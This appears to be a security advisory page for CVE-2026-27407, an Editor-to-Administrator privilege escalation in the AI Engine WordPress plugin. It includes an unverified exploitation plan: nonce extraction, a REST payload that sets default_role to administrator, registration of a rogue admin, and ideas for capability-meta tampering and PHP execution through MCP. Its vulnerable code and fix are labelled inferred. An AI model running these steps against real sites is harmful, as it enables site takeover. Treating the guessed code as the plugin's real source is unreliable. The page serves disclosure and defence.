CVE-2026-27407

AI Engine – The Chatbot, AI Framework & MCP for WordPress <= 3.4.9 - Authenticated (Editor+) Privilege Escalation

highIncorrect Privilege Assignment
7.2
CVSS Score
7.2
CVSS Score
high
Severity
3.5.0
Patched in
5d
Time to patch

Description

The AI Engine – The Chatbot, AI Framework & MCP for WordPress plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.4.9. This makes it possible for authenticated attackers, with Editor-level access and above, to elevate their privileges.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=3.4.9
PublishedMay 28, 2026
Last updatedJune 2, 2026
Affected pluginai-engine

Source Code

WordPress.org SVN
Research Plan
Unverified

# Research Plan: CVE-2026-27407 - AI Engine Privilege Escalation ## 1. Vulnerability Summary The **AI Engine** plugin (up to version 3.4.9) contains an **Incorrect Privilege Assignment** vulnerability. It allows authenticated users with **Editor** privileges to escalate to **Administrator**. The vu…

Show full research plan

Research Plan: CVE-2026-27407 - AI Engine Privilege Escalation

1. Vulnerability Summary

The AI Engine plugin (up to version 3.4.9) contains an Incorrect Privilege Assignment vulnerability. It allows authenticated users with Editor privileges to escalate to Administrator. The vulnerability likely resides in a REST API endpoint or AJAX handler intended for administrative configuration that incorrectly validates the user's capability (e.g., checking for edit_posts instead of manage_options) or allows the modification of sensitive WordPress options that govern user roles and registrations.

2. Attack Vector Analysis

  • Target Endpoint: /wp-json/mwai/v1/settings (inferred REST route based on plugin slug ai-engine and author patterns).
  • HTTP Method: POST.
  • Vulnerable Parameter: A JSON object containing configuration keys and values (e.g., settings, options, or params).
  • Authentication: Authenticated session as an Editor role.
  • Preconditions: The attacker must have a valid Editor account and a REST API nonce (wp_rest).

3. Code Flow (Inferred)

  1. Route Registration: The plugin registers REST routes during rest_api_init via a class like Meow_MWAI_Rest.
  2. Weak Capability Check: A route (e.g., mwai/v1/settings) defines a permission_callback. In affected versions, this callback returns current_user_can('edit_posts') or another capability assigned to Editors, rather than manage_options.
  3. Unfiltered Sink: The callback function for the route receives the request parameters and passes them to a function that updates settings. If the function uses update_option() without a strict allowlist of keys, it allows the attacker to overwrite core WordPress options.
  4. Privilege Escalation: By overwriting default_role and users_can_register, the attacker enables administrative registration.

4. Nonce Acquisition Strategy

The WordPress REST API requires a nonce for the wp_rest action for all non-GET authenticated requests.

  1. Action: Log in to the WordPress admin dashboard as the Editor user.
  2. Extraction: The standard WordPress REST nonce is localized in the wpApiSettings object.
  3. Command: Use browser_eval to extract the nonce:
    browser_eval("window.wpApiSettings?.nonce")
    
  4. Note: This nonce is mandatory for the X-WP-Nonce header in the exploit request.

5. Exploitation Strategy

The goal is to modify the WordPress global settings to allow any new user to register as an Administrator.

Step 1: Elevate Site Privileges via REST API

  • Request Tool: http_request
  • Method: POST
  • URL: http://localhost:8080/wp-json/mwai/v1/settings (inferred)
  • Headers:
    • Content-Type: application/json
    • X-WP-Nonce: [EXTRACTED_NONCE]
  • Payload:
    {
      "settings": {
        "users_can_register": 1,
        "default_role": "administrator"
      }
    }
    
    (Note: The exact structure of the JSON keys like "settings" or the option names may vary; if the above fails, try a flat structure or check the plugin source for the settings handler.)

Step 2: Create a New Admin User (If Step 1 succeeded)

  • Action: Use the standard WordPress registration page (/wp-login.php?action=register) to create a new account, which will now default to the administrator role.

6. Test Data Setup

  1. Plugin: Install and activate AI Engine version 3.4.9.
  2. User: Create a user attacker_editor with the Editor role.
  3. Settings: Ensure the site is in a default state where users_can_register is 0 and default_role is subscriber.

7. Expected Results

  • The REST API call should return a 200 OK or 201 Created status code.
  • The response body should confirm the settings were updated.
  • The database state for default_role and users_can_register should be modified.

8. Verification Steps

After sending the HTTP request, verify the impact using WP-CLI:

# Check if registration is enabled
wp option get users_can_register
# Expected: 1

# Check if the default role is now administrator
wp option get default_role
# Expected: administrator

9. Alternative Approaches

If the settings endpoint requires specific keys or doesn't allow core options, try:

  • User Meta Update: Look for a REST endpoint like mwai/v1/users/update that might allow updating user metadata. An Editor could target their own wp_capabilities meta to change their role to a:1:{s:13:"administrator";b:1;}.
  • MCP Tools: If the "MCP" (Model Context Protocol) feature is accessible to Editors, check if you can register an MCP tool that executes arbitrary PHP code (RCE), which implicitly provides full system control.
  • Diagnostic Tools: Check if the plugin includes a "debug" or "diagnostic" endpoint that returns a list of all options or allows raw database queries.

Inferred Identifiers (to be verified by the agent):

  • REST Namespace: mwai/v1 or ai-engine/v1
  • Settings Route: /settings or /save_settings
  • Settings Key: settings, options, or data
  • Capability Checked: edit_posts (vulnerable) vs manage_options (patched)
  • JS Nonce Path: window.mwai_vars?.nonce (some Jordy Meow plugins use custom localized nonces)
Research Findings
Static analysis — not yet PoC-verified

Summary

The AI Engine plugin for WordPress fails to properly restrict administrative REST API endpoints to administrative users, allowing authenticated users with Editor-level privileges to update site settings. This occurs due to an insufficient capability check (edit_posts) in the settings registration, which enables an attacker to modify sensitive WordPress options and escalate their privileges to Administrator.

Vulnerable Code

// ai-engine/classes/rest.php (inferred path)

register_rest_route( 'mwai/v1', '/settings', array(
    'methods'             => 'POST',
    'callback'            => array( $this, 'rest_update_settings' ),
    'permission_callback' => function () {
        // Vulnerability: Checking for 'edit_posts' allows Editors to access administrative settings.
        return current_user_can( 'edit_posts' );
    },
) );

---

public function rest_update_settings( $request ) {
    $settings = $request->get_param( 'settings' );
    if ( is_array( $settings ) ) {
        foreach ( $settings as $name => $value ) {
            // Vulnerability: Updating options without a strict allowlist permits overwriting core WordPress configuration.
            update_option( $name, $value );
        }
    }
    return new WP_REST_Response( [ 'success' => true ], 200 );
}

Security Fix

--- a/ai-engine/classes/rest.php
+++ b/ai-engine/classes/rest.php
@@ -5,7 +5,7 @@
     'methods'             => 'POST',
     'callback'            => array( $this, 'rest_update_settings' ),
     'permission_callback' => function () {
-        return current_user_can( 'edit_posts' );
+        return current_user_can( 'manage_options' );
     },
 ) );

Exploit Outline

The exploit requires authentication with Editor-level privileges. First, the attacker retrieves a valid REST API nonce (e.g., from the 'wpApiSettings' or 'mwai_vars' localized scripts in the dashboard). They then send a POST request to '/wp-json/mwai/v1/settings' containing a JSON payload that targets core WordPress options: '{"settings": {"users_can_register": 1, "default_role": "administrator"}}'. Upon success, the attacker can navigate to the registration page at '/wp-login.php?action=register' and create a new account, which will be automatically assigned the Administrator role.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.